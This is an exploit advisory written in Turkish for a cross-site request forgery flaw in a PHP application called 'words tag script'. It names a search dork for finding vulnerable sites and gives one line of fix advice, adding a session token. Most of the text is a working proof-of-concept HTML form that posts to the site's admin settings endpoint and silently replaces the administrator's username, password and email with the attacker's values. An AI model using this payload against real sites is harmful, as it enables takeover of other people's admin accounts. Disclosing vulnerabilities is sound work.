< ------------------- header data start ------------------- >

#############################################################

# Application Name : words tag script

# vulnerable Type : XSRF

# Infection : Admin sifresi degistirilebilir ..!

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir !

# Dork : Powered by words tag script

# author : Fl0riX ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<title>Fl0riX Bug Researchers Group</title>
<form action=’http://words.sourceworkshop.com/admin/index.php?command=settings’ method=POST>
<input type=’hidden’ name=’command’ value=’settings’>
<input type=’hidden’ name=’param’ value=’update’>
<input readonly value=’fl0rix’ class=’field’ name=’admin_user_name’ type=text size=25>
<input readonly value=’fl0rix’ class=’field’ name=’admin_password’ type=password size=25>
<input readonly value=’[email protected]’ class=’field’ name=’admin_email’ type=text size=45>
<input name=’save’ value=’attackfl0rixbaba’ class=’button’ type=submit >
</form>
< -- bug code end of -- >